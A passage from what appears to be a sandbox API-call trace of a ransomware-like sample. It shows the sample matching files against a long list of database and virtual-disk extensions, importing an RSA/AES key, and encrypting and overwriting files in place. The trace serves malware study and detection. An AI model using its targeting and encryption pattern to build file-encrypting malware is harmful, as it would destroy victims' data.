Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".pdb") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".pdm") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".pnz") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".qry") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".qvd") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".rbf") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".rctd") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".rod") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".rodx") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".rpd") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".rsd") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sas7bdat") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sbf") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".scx") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sdb") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sdc") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sdf") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sis") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".spq") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sql") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sqlite") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sqlite3") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".sqlitedb") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".te") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".temx") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".tmd") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".tps") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".trc") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".trm") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".udb") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".udl") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".usr") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".v12") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vis") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vpd") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vvv") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".wdb") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".wmdb") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".wrk") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".xdb") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".xld") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".xmlff") returned 0x0 [0158.272] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".abcddb") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".abs") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".abx") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".accdw") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".adn") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".db2") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fm5") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".hjt") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".icg") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".icr") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".kdb") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".lut") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".maw") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mdn") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mdt") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vdi") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vhd") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vmdk") returned 0x0 [0158.273] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".pvm") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vmem") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vmsn") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vmsd") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nvram") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vmx") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".raw") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".qcow2") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".subvol") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".bin") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vsv") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".avhd") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vmrs") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vhdx") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".avdx") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".vmcx") returned 0x0 [0158.274] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".iso") returned 0x0 [0158.274] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.275] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0158.731] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0158.731] SetEndOfFile (hFile=0x6ec) returned 1 [0158.731] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.731] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x1cccf8, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x1cccf8, lpOverlapped=0x0) returned 1 [0160.824] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe33308, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.825] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x1cccf8, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x1cccf8, lpOverlapped=0x0) returned 1 [0160.835] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x1cccf8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.835] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x1cccf8, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x1cccf8, lpOverlapped=0x0) returned 1 [0161.997] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe33308, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.997] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x1cccf8, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc2c*=0x1cccf8, lpOverlapped=0x0) returned 1 [0162.026] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x1cccf8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.026] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x1cccf8, lpNumberOfBytesRead=0x373fc80, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc80*=0x1cccf8, lpOverlapped=0x0) returned 1 [0162.152] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xffe33308, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.153] WriteFile (hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToWrite=0x1cccf8, lpNumberOfBytesWritten=0x373fc2c, lpOverlapped=0x0) Thread: id = 3 os_tid = 0xb34 [0055.529] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x4610000 [0055.530] CryptAcquireContextA (in: phProv=0x383fcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x383fcf4*=0xeced80) returned 1 [0055.531] CryptImportKey (in: hProv=0xeced80, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x383ff80 | out: phKey=0x383ff80*=0xececd0) returned 1 [0055.531] Sleep (dwMilliseconds=0x1f4) [0060.625] Sleep (dwMilliseconds=0x1f4) [0069.842] Sleep (dwMilliseconds=0x1f4) [0070.518] Sleep (dwMilliseconds=0x1f4) [0071.043] Sleep (dwMilliseconds=0x1f4) [0071.558] Sleep (dwMilliseconds=0x1f4) [0072.073] Sleep (dwMilliseconds=0x1f4) [0072.723] Sleep (dwMilliseconds=0x1f4) [0076.826] Sleep (dwMilliseconds=0x1f4) [0077.329] Sleep (dwMilliseconds=0x1f4) [0077.844] Sleep (dwMilliseconds=0x1f4) [0078.360] Sleep (dwMilliseconds=0x1f4) [0078.874] Sleep (dwMilliseconds=0x1f4) [0079.389] Sleep (dwMilliseconds=0x1f4) [0079.903] Sleep (dwMilliseconds=0x1f4) [0080.418] Sleep (dwMilliseconds=0x1f4) [0080.933] Sleep (dwMilliseconds=0x1f4) [0081.448] Sleep (dwMilliseconds=0x1f4) [0081.963] Sleep (dwMilliseconds=0x1f4) [0082.478] Sleep (dwMilliseconds=0x1f4) [0083.190] Sleep (dwMilliseconds=0x1f4) [0084.100] Sleep (dwMilliseconds=0x1f4) [0084.653] Sleep (dwMilliseconds=0x1f4) [0085.161] Sleep (dwMilliseconds=0x1f4) [0085.675] Sleep (dwMilliseconds=0x1f4) [0086.253] Sleep (dwMilliseconds=0x1f4) [0086.767] Sleep (dwMilliseconds=0x1f4) [0087.282] Sleep (dwMilliseconds=0x1f4) [0087.797] Sleep (dwMilliseconds=0x1f4) [0088.598] Sleep (dwMilliseconds=0x1f4) [0089.499] Sleep (dwMilliseconds=0x1f4) [0090.047] Sleep (dwMilliseconds=0x1f4) [0090.561] Sleep (dwMilliseconds=0x1f4) [0091.233] Sleep (dwMilliseconds=0x1f4) [0091.754] Sleep (dwMilliseconds=0x1f4) [0092.526] Sleep (dwMilliseconds=0x1f4) [0093.110] Sleep (dwMilliseconds=0x1f4) [0093.644] Sleep (dwMilliseconds=0x1f4) [0094.202] Sleep (dwMilliseconds=0x1f4) [0094.737] Sleep (dwMilliseconds=0x1f4) [0095.238] Sleep (dwMilliseconds=0x1f4) [0095.754] Sleep (dwMilliseconds=0x1f4) [0096.268] Sleep (dwMilliseconds=0x1f4) [0096.799] Sleep (dwMilliseconds=0x1f4) [0097.313] Sleep (dwMilliseconds=0x1f4) [0097.835] Sleep (dwMilliseconds=0x1f4) [0098.358] Sleep (dwMilliseconds=0x1f4) [0098.874] Sleep (dwMilliseconds=0x1f4) [0099.879] Sleep (dwMilliseconds=0x1f4) [0100.423] Sleep (dwMilliseconds=0x1f4) [0100.943] Sleep (dwMilliseconds=0x1f4) [0101.460] Sleep (dwMilliseconds=0x1f4) [0101.995] Sleep (dwMilliseconds=0x1f4) [0102.724] Sleep (dwMilliseconds=0x1f4) [0103.334] Sleep (dwMilliseconds=0x1f4) [0103.870] Sleep (dwMilliseconds=0x1f4) [0104.387] Sleep (dwMilliseconds=0x1f4) [0105.010] Sleep (dwMilliseconds=0x1f4) [0105.558] Sleep (dwMilliseconds=0x1f4) [0106.585] Sleep (dwMilliseconds=0x1f4) [0107.110] Sleep (dwMilliseconds=0x1f4) [0107.735] Sleep (dwMilliseconds=0x1f4) [0108.359] Sleep (dwMilliseconds=0x1f4) [0108.900] Sleep (dwMilliseconds=0x1f4) [0109.403] Sleep (dwMilliseconds=0x1f4) [0110.103] Sleep (dwMilliseconds=0x1f4) [0110.604] Sleep (dwMilliseconds=0x1f4) [0111.337] Sleep (dwMilliseconds=0x1f4) [0111.859] Sleep (dwMilliseconds=0x1f4) [0112.591] Sleep (dwMilliseconds=0x1f4) [0113.127] Sleep (dwMilliseconds=0x1f4) [0113.651] Sleep (dwMilliseconds=0x1f4) [0114.279] Sleep (dwMilliseconds=0x1f4) [0114.798] Sleep (dwMilliseconds=0x1f4) [0115.735] Sleep (dwMilliseconds=0x1f4) [0116.240] Sleep (dwMilliseconds=0x1f4) [0116.878] Sleep (dwMilliseconds=0x1f4) [0117.468] Sleep (dwMilliseconds=0x1f4) [0117.983] Sleep (dwMilliseconds=0x1f4) [0118.498] Sleep (dwMilliseconds=0x1f4) [0119.307] Sleep (dwMilliseconds=0x1f4) [0119.815] Sleep (dwMilliseconds=0x1f4) [0120.738] Sleep (dwMilliseconds=0x1f4) [0121.272] Sleep (dwMilliseconds=0x1f4) [0121.805] Sleep (dwMilliseconds=0x1f4) [0122.493] Sleep (dwMilliseconds=0x1f4) [0123.046] Sleep (dwMilliseconds=0x1f4) [0123.573] Sleep (dwMilliseconds=0x1f4) [0124.083] Sleep (dwMilliseconds=0x1f4) [0124.844] Sleep (dwMilliseconds=0x1f4) [0125.347] Sleep (dwMilliseconds=0x1f4) [0125.862] Sleep (dwMilliseconds=0x1f4) [0126.376] Sleep (dwMilliseconds=0x1f4) [0126.891] Sleep (dwMilliseconds=0x1f4) [0127.572] Sleep (dwMilliseconds=0x1f4) [0128.217] Sleep (dwMilliseconds=0x1f4) [0128.731] Sleep (dwMilliseconds=0x1f4) [0129.246] Sleep (dwMilliseconds=0x1f4) [0129.761] Sleep (dwMilliseconds=0x1f4) [0130.380] Sleep (dwMilliseconds=0x1f4) [0130.915] Sleep (dwMilliseconds=0x1f4) [0131.430] Sleep (dwMilliseconds=0x1f4) [0131.945] Sleep (dwMilliseconds=0x1f4) [0132.477] Sleep (dwMilliseconds=0x1f4) [0136.526] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0136.530] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0136.530] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0136.530] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0136.531] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0136.533] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.533] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin" (normalized: "c:\\$recycle.bin")) returned 0x16 [0136.534] CreateFileW (lpFileName="C:\\$Recycle.Bin" (normalized: "c:\\$recycle.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.534] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.534] GetLastError () returned 0x5 [0136.535] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8938 | out: hHeap=0xea0000) returned 1 [0136.535] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec86b8 | out: hHeap=0xea0000) returned 1 [0136.535] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0136.535] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0136.535] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0136.535] GetFileAttributesW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 0x27 [0136.540] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0136.541] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0136.541] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.541] GetLastError () returned 0x5 [0136.541] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec86e0 | out: hHeap=0xea0000) returned 1 [0136.541] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8758 | out: hHeap=0xea0000) returned 1 [0136.541] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0136.541] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0136.541] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0136.542] GetFileAttributesW (lpFileName="C:\\System Volume Information" (normalized: "c:\\system volume information")) returned 0x16 [0136.542] CreateFileW (lpFileName="C:\\System Volume Information" (normalized: "c:\\system volume information"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.542] GetLastError () returned 0x5 [0136.542] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc6a8 | out: hHeap=0xea0000) returned 1 [0136.542] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0136.542] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0136.543] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0136.543] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0136.543] GetFileAttributesW (lpFileName="C:\\Windows" (normalized: "c:\\windows")) returned 0x10 [0136.543] CreateFileW (lpFileName="C:\\Windows" (normalized: "c:\\windows"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.543] GetLastError () returned 0x5 [0136.543] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ef0 | out: hHeap=0xea0000) returned 1 [0136.543] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ec8 | out: hHeap=0xea0000) returned 1 [0136.543] Sleep (dwMilliseconds=0x1f4) [0137.311] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0137.311] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0137.311] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0137.312] GetFileAttributesW (lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini")) returned 0x26 [0137.312] CreateFileW (lpFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0137.312] GetLastError () returned 0x0 [0137.312] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=174) returned 1 